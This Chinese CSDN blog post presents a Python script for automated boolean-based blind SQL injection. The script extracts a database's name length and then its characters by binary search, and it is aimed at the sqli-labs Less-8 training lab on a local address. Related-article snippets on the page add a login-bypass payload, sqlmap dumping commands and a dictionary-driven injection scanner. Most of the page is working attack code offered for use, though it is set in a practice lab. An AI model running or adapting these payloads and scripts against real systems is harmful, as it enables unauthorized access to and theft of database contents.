SQL注入获取数据库名—自动化脚本

最新推荐文章于 2024-05-22 10:15:00 发布
最新推荐文章于 2024-05-22 10:15:00 发布
阅读量2.5k 收藏 3
点赞数
文章标签: sql 自动化 渗透测试 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48968378/article/details/121775414
版权

1、搭建好python环境,在脚本目录下新建cmd.bat文件(文件内容:cmd.exe)。

 

2、修改好标志位和payload后,点击cmd.bat进入cmd见面,输入python 文件名运行就OK了。

3、脚本源码:

import requests
import sys
payload=''
url=''
flag='You are in'#标志位——代表请求是否正确
def StartSqli(url):
    DBNameLen=0
    print('[-]开始获取数据库的长度')
    for DBNameLen in range(1,100):
        payload="' and if(length(database())=%d,1,0)--+"%DBNameLen
        targeturl=url % payload
        response=requests.get(targeturl)
        if response.text.find('You are in')!=-1:
            print(targeturl)
            print("[+]数据库长度:%d"%DBNameLen)
            DBName(url,DBNameLen)
            break
def DBName(url,Len):
    payload="' and ascii(substr(database(),%s,1))>%s --+"
    database=''
    print("开始获取数据库名:")
    for i in range(1,Len+1):
        max=122    #z:对应ASCII值
        min=65    #A
        while abs(max-min)>1: 
            mid=int((max+min)/2)
            p=payload % (str(i),str(mid))
            response=requests.get(url % p)
            if flag in response.content.decode("utf-8"): 
                min=mid
            else:
                max=mid
        database=database+chr(max)
        print("[-]The database:%s" % database)  

if __name__ == '__main__':
    url='http://192.168.243.130:8080/Less-8/?id=3%s'
    StartSqli(url)

 

Emxiai
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql获取数据库、表、存储过程等信息的方法
Jason's Word
06-30 1622
<br />1.获取所有用户:<br />SELECT name FROM Sysusers where status='2' and islogin='1'<br />islogin='1'表示帐户<br />islogin='0'表示角色<br />status='2'表示用户帐户<br />status='0'表示糸统帐户<br />2.获取所有数据库:<br />SELECT Name FROM Master..SysDatabases ORDER BY Name<br />3.获取所有表<b
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1390
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列、存储过程等。
SQL注入sqlmap入门教程_sqlmap注入
最新发布
m0_61869253的博客
05-22 679
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
pikachu如何利用字符型SQL注入拿下数据库
m0_61903602的博客
10-30 852
pikachu如何利用字符型SQL注入拿下数据库
SQL注入——字符型union注入
heyingcheng的博客
03-04 549
使用union注入拿到靶机中数据库里的所有用户和密码查询语句:select 列 from 表 where 限定语句以sql-labs中的less-1为例。
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 6011
渗透测试-SQL注入之核心语法获取数据库信息
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 1775
【实训04】数据库SQL注入漏洞
Python填充SQL参数脚本.zip
05-28
这种方式能有效防止SQL注入,因为数据库引擎会预先解析并验证SQL结构,而不关心参数的具体内容。 Python中,我们可以使用`sqlite3`库(对于SQLite数据库)或`pyodbc`、`pymysql`、`psycopg2`等库(对于其他数据库如...
SQL注入文献.zip
03-18
9. **SQL注入与XSS攻击自动化检测关键技术研究**(SQL注入与XSS攻击自动化检测关键技术研究.pdf):该论文可能涵盖了SQL注入和跨站脚本(XSS)攻击的共同点和区别,并提出自动化检测这两种威胁的技术和工具。...
自己动手编写SQL注入漏洞扫描工具
12-31
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库获取敏感信息或执行非法操作。这个项目可能是用某种编程语言(如Python、Java或C#)实现的,目标是帮助开发者和安全研究...
SQL-根据数据库自动生成表中字段工具
01-11
SQL-根据数据库自动生成表中字段工具”是一个高效实用的开发辅助工具,它结合了SQL语言的核心特性,帮助开发者更便捷地处理与数据库表结构相关的任务,提升开发效率,同时也体现了数据库编程和自动化工具设计...
数据库质疑脚本
11-29
脚本可能包含了自动化备份脚本、验证备份完整性的工具以及灾难恢复计划。 6. **监控与日志**:通过监控数据库性能指标(如CPU使用率、内存占用、I/O操作)和记录日志,可以发现潜在问题。质疑脚本可能包含这样的...
SQL获取所有数据库、表、储存过程以及参数列表
11-22 472
1.获取所有用户: SELECT name FROM Sysusers where status='2' and islogin='1' islogin='1'表示帐户 islogin='0'表示角色 status='2'表示用户帐户 status='0'表示糸统帐户 2.获取所有数据库: SELECT Name FROM Master..SysDatabases ORDER B
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1240
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
sql注入 mysql数据库字_sql注入 - osc_dfi5j6xi的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39650784的博客
02-22 1454
SQL基础: 注入点的判断:首先判断该注入点是怎么闭合的,常用的是','),')),",再利用and 1=2,and 1=1判断闭合是否正确sql注入常用语句:普通语句:schema_name——数据库table_name——表;column_name——字段;查询数据库:select schema_name from information_schema.schemata--+查询数据库...
DDL操作数据库
weixin_45701447的博客
09-09 763
一.什么是 sql sructured Query Language:结构化查询语言 定义了操作所有 关系型数据库的规则 。每一种数据库操作的方式存在不一样的地方称为方言. 二.sql 通用的语法 1.sql可以单行书写 也可以多行书写 以 分号 结尾 2.mysql 不区分大小写但是关键字 建议大写 三.sql分类 1.DDL:操作数据库和表 (1)操作数据库:CRUD C:创建 创建数据库 create database 数据库称; create database if not exists 数据库
sql注入获取数据库
qq_35490522的博客
07-25 807
sql注入和可能存在目录遍历和xss和csrf 获取web服务操作系统、web应用服务器、DBMS、当前数据等信息 sqlmap.py -u "http://域/about.asp?id=325" --dbs --current-user 显示数据库中的表,执行命令样式: sqlmap.py -u "http://域/about.asp?id=325" --tables 选择admin表,显示表的结构,执行命令:./sqlmap.py -u "http://域/about.asp?id=325"
sql注入 mysql数据库字_web渗透-SQL注入数据库信息盗取
weixin_33198642的博客
02-22 680
sql注入原理脚本代码接收来自前端数据未进行过滤,导致恶意sql语句插入到数据库中查询执行。如下代码:$id = $_GET['id'];$sql = "select * from user where id=$id";.......$result = mysql_query($sql);?>sql注入攻击流程1.and语法判断是否存在注入点And 1=1正确页面And 1=2错误页面结果:...
获取所有用户 sql server
jgwei的专栏
02-18 7738
http://www.cnblogs.com/virusswb/articles/1259207.html 1.获取所有用户: SELECT name FROM Sysusers where status='2' and islogin='1' islogin='1'表示帐户 islogin='0'表示角色 status='2'表示用户帐户 status='0'表示糸统帐
sql盲注之报错注入(附自动化脚本)
05-22
SQL注入是一种常见的网络攻击方式,通过在输入框中注入SQL语句,攻击者可以获取数据库中的敏感信息,包括用户、密码等。报错注入是一种SQL注入的方式,它利用了数据库返回错误信息的特性,通过构造特定的SQL语句来达到获取信息的目的。 以下是一个简单的报错注入示例: 假设有一个登录页面,用户需要输入用户和密码才能登录。页面的代码如下: ``` <?php $conn = mysqli_connect("localhost", "root", "", "mydb"); if (isset($_POST['submit'])) { $username = $_POST['username']; $password = $_POST['password']; $sql = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysqli_query($conn, $sql); if (mysqli_num_rows($result) > 0) { echo "登录成功"; } else { echo "用户或密码错误"; } } ?> <form method="POST"> 用户:<input type="text" name="username"><br> 密码:<input type="password" name="password"><br> <input type="submit" name="submit" value="登录"> </form> ``` 攻击者可以通过在输入框中注入SQL语句来获取数据库中的信息。例如,输入`' OR 1=1--`作为用户,`' OR 1=1--`作为密码,即可绕过登录验证,因为`OR 1=1`会使整个SQL语句始终成立,从而返回所有用户的信息。 如果服务器没有开启报错信息,攻击者还可以通过构造特定的SQL语句,使服务器返回错误信息,从而获取数据库中的信息。例如,输入`' UNION SELECT 1,2,3--`作为用户,任意密码,即可触发错误信息,因为`UNION SELECT`语句要求两个SELECT语句的列数必须相同,而这里只有一个SELECT语句,因此会导致错误。 以下是一个自动化脚本示例,用于检测一个网站是否存在报错注入漏洞: ``` import requests # 构造SQL语句,检测是否存在报错注入漏洞 def test_sqli(url, payload): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3", "Cookie": "PHPSESSID=1234567890" } data = { "username": payload, "password": "123456" } try: r = requests.post(url, headers=headers, data=data, timeout=5) if "Warning" in r.text: print("[+] 存在报错注入漏洞:" + payload) except: pass # 读取字典文件,逐个测试 def main(): url = "http://example.com/index.php" with open("dict.txt", "r") as f: for line in f: payload = line.strip() test_sqli(url, payload) if __name__ == '__main__': main() ``` 该脚本会读取一个字典文件,逐个测试其中的payload,如果存在报错注入漏洞,则会输出相应的payload。需要注意的是,该脚本只能检测是否存在报错注入漏洞,不能获取具体的数据库信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值